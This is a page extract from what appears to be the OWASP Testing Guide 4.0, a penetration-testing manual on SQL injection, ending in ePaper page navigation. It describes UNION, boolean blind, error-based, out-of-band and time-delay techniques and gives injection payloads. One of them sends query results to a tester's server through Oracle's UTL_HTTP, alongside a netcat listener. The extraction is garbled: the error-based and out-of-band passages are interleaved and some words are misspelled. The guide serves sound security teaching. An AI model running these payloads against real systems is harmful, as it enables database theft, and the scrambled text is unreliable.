4.0

More documents

Recommendations

Info

112Web Application Penetration TestingAll cells in a column must have the same datatypeIf the query executes with success, the first column can be an integer.Then the tester can move further and so on:http:/www.example.com/product.php?id=10 UNION SELECT1,1,null--After the successful information gathering, depending on the application,it may only show the tester the first result, because theapplication treats only the first line of the result set. In this case,it is possible to use a LIMIT clause or the tester can set an invalidvalue, making only the second query valid (supposing there is noentry in the database which ID is 99999):http:/www.example.com/product.php?id=99999 UNIONSELECT 1,1,null--Boolean Exploitation TechniqueThe Boolean exploitation technique is very useful when the testerfinds a Blind SQL Injection situation, in which nothing is known onthe outcome of an operation. For example, this behavior happensin cases where the programmer has created a custom error pagethat does not reveal anything on the structure of the query or onthe database. (The page does not return a SQL error, it may justreturn a HTTP 500, 404, or redirect).By using inference methods, it is possible to avoid this obstacleand thus to succeed in recovering the values of some desiredfields. This method consists of carrying out a series of booleanqueries against the server, observing the answers and finallydeducing the meaning of such answers. We consider, as always,the www.example.com domain and we suppose that it contains aparameter named id vulnerable to SQL injection. This means thatcarrying out the following request:http:/www.example.com/index.php?id=1’We will get one page with a custom message error which is due toa syntactic error in the query. We suppose that the query executedon the server is:SELECT field1, field2, field3 FROM Users WHERE Id=’$Id’Which is exploitable through the methods seen previously. Whatwe want to obtain is the values of the username field. The teststhat we will execute will allow us to obtain the value of the usernamefield, extracting such value character by character. This ispossible through the use of some standard functions, present inpractically every database. For our examples, we will use the followingpseudo-functions:SUBSTRING (text, start, length): returns a substring starting fromthe position “start” of text and of length “length”. If “start” is greater than the length of text, the function returns anull value.ASCII (char): it gives back ASCII value of the input character. A nullvalue is returned if char is 0.LENGTH (text): it gives back the number of characters in the inputtext.Through such functions, we will execute our tests on the firstcharacter and, when we have discovered the value, we will passto the second and so on, until we will have discovered the entirevalue. The tests will take advantage of the function SUBSTRING,in order to select only one character at a time (selecting a singlecharacter means to impose the length parameter to 1), and thefunction ASCII, in order to obtain the ASCII value, so that we can donumerical comparison. The results of the comparison will be donewith all the values of the ASCII table, until the right value is found.As an example, we will use the following value for Id:$Id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1That creates the following query (from now on, we will call it “inferentialquery”):SELECT field1, field2, field3 FROM Users WHERE Id=’1’ ANDASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1’The previous example returns a result if and only if the first characterof the field username is equal to the ASCII value 97. If we geta false value, then we increase the index of the ASCII table from97 to 98 and we repeat the request. If instead we obtain a truevalue, we set to zero the index of the ASCII table and we analyzethe next character, modifying the parameters of the SUBSTRINGfunction. The problem is to understand in which way we can distinguishtests returning a true value from those that return false.To do this, we create a query that always returns false. This is possibleby using the following value for Id:$Id=1’ AND ‘1’ = ‘2Which will create the following query:SELECT field1, field2, field3 FROM Users WHERE Id=’1’ AND ‘1’= ‘2’The obtained response from the server (that is HTML code) will bethe false value for our tests. This is enough to verify whether thevalue obtained from the execution of the inferential query is equalto the value obtained with the test executed before.Sometimes, this method does not work. If the server returns twodifferent pages as a result of two identical consecutive web requests,we will not be able to discriminate the true value fromthe false value. In these particular cases, it is necessary to useparticular filters that allow us to eliminate the code that changesbetween the two requests and to obtain a template. Later on,for every inferential request executed, we will extract the relativetemplate from the response using the same function, and we willperform a control between the two templates in order to decidethe result of the test.
113Web Application Penetration TestingIn the previous discussion, we haven’t dealt with the problem ofdetermining the termination condition for out tests, i.e., when weshould end the inference procedure.A techniques to do this uses one characteristic of the SUBSTRINGfunction and the LENGTH function. When the test compares thecurrent character with the ASCII code 0 (i.e., the value null) and thetest returns the value true, then either we are done with the inferenceprocedure (we have scanned the whole string), or the valuewe have analyzed contains the null character.We will insert the following value for the field Id:$Id=1’ AND LENGTH(username)=N AND ‘1’ = ‘1Where N is the number of characters that we have analyzed up tonow (not counting the null value). The query will be:SELECT field1, field2, field3 FROM Users WHERE Id=’1’ ANDLENGTH(username)=N AND ‘1’ = ‘1’The query returns either true or false. If we obtain true, then wehave completed the inference and, therefore, we know the valueof the parameter. If we obtain false, this means that the nullcharacter is present in the value of the parameter, and we mustcontinue to analyze the next parameter until we find another nullvalue.The blind SQL injection attack needs a high volume of queries. Thetester may need an automatic tool to exploit the vulnerability.Error based Exploitation techniqueAn Error based exploitation technique is useful when the testerfor some reason can’t exploit the SQL injection vulnerability usingother technique such as UNION. The Error based technique consistsin forcing the database to perform some operation in whichthe result will be an error. The point here is to try to extract somedata from the database and show it in the error message. This exploitationtechnique can be different from DBMS to DBMS (checkDBMS specific section).Consider the following SQL query:passed to it, which is other query, the name of the user. When thedatabase looks for a host name with the user database name, itwill fail and return an error message like:ORA-292257: host SCOTT unknownThen the tester can manipulate the parameter passed to GET_HOST_NAME() function and the result will be shown in the errormessage.Out of band Exploitation techniqueThis technique is very useful when the tester find a Blind SQL Injectionsituation, in which nothing is known on the outcome of anoperation. The technique consists of the use of DBMS functions toperform an out of band connection and deliver the results of theinjected query as part of the request to the tester’s server. Like theerror based techniques, each DBMS has its own functions. Checkfor specific DBMS section.Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_productConsider also the request to a script who executes the queryabove:http:/www.example.com/product.php?id=10The malicious request would be:http:/www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELET user FROM DUAL)--In this example, the tester is concatenating the value 10 with theresult of the function UTL_HTTP.request. This Oracle function willtry to connect to ‘testerserver’ and make a HTTP GET request containingthe return from the query “SELECT user FROM DUAL”. Thetester can set up a webserver (e.g. Apache) or use the Netcat tool:SELECT * FROM products WHERE id_product=$id_productConsider also the request to a script who executes the queryabove:http:/www.example.com/product.php?id=10The malicious request would be (e.g. Oracle 10g):http:/www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--In this example, the tester is concatenating the value 10 with theresult of the function UTL_INADDR.GET_HOST_NAME. This Oraclefunction will try to return the host name of the parameter/home/tester/nc –nLp 80GET /SCOTT HTTP/1.1 Host: testerserver.com Connection: closeTime delay Exploitation techniqueThe Boolean exploitation technique is very useful when the testerfind a Blind SQL Injection situation, in which nothing is known onthe outcome of an operation. This technique consists in sendingan injected query and in case the conditional is true, the tester canmonitor the time taken to for the server to respond. If there is adelay, the tester can assume the result of the conditional query istrue. This exploitation technique can be different from DBMS toDBMS (check DBMS specific section).Consider the following SQL query:SELECT * FROM products WHERE id_product=$id_product
Page 1 and 2:
1Testing Guide4.0Project Leaders: M
Page 3 and 4:
Testing Guide Foreword - Table of c
Page 5 and 6:
3Testing Guide Foreword - Table of
Page 7 and 8:
5Testing Guide Foreword - By Eoin K
Page 9 and 10:
7Testing Guide Frontispiece1Testing
Page 11 and 12:
9Testing Guide Introduction2The OWA
Page 13 and 14:
11Testing Guide Introductionvide en
Page 15 and 16:
13Testing Guide IntroductionTesting
Page 17 and 18:
15Testing Guide Introductionlaid on
Page 19 and 20:
17Testing Guide Introductionvalidat
Page 21 and 22:
19Testing Guide IntroductionUSERthe
Page 23 and 24:
21Testing Guide Introductionment wh
Page 25 and 26:
23Testing Guide Introductionoffendi
Page 27 and 28:
25The OWASP Testing Frameworksectio
Page 29 and 30:
27Web Application Penetration Testi
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
Page 45 and 46:
Page 47 and 48:
Page 49 and 50:
Page 51 and 52:
Page 53 and 54:
Page 55 and 56:
Page 57 and 58:
Page 59 and 60:
Page 61 and 62:
Page 63 and 64: 61Web Application Penetration Testi
Page 103 and 104: 101Web Application Penetration Test
Page 113: 111Web Application Penetration Test
Page 165 and 166:
163Web Application Penetration Test
Page 167 and 168:
Page 169 and 170:
Page 171 and 172:
Page 173 and 174:
Page 175 and 176:
Page 177 and 178:
Page 179 and 180:
Page 181 and 182:
Page 183 and 184:
Page 185 and 186:
Page 187 and 188:
Page 189 and 190:
Page 191 and 192:
Page 193 and 194:
Page 195 and 196:
Page 197 and 198:
Page 199 and 200:
Page 201 and 202:
Page 203 and 204:
Page 205 and 206:
Page 207 and 208:
Page 209 and 210:
Page 211 and 212:
209same code can be applied to sess
Page 213 and 214:
211ReportingTest IDLowest versionIn
Page 215 and 216:
213ReportingTest IDBusiness Logic T
Page 217 and 218:
215Appendixkajfghlhfkcocafkcjlajldi
Page 219 and 220:
217AppendixTesting - http:/www.nist
Page 221 and 222:
219Cross Site Scripting (XSS)For de
Page 223 and 224:
221LDAP InjectionFor details on LDA
show all

4.0

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?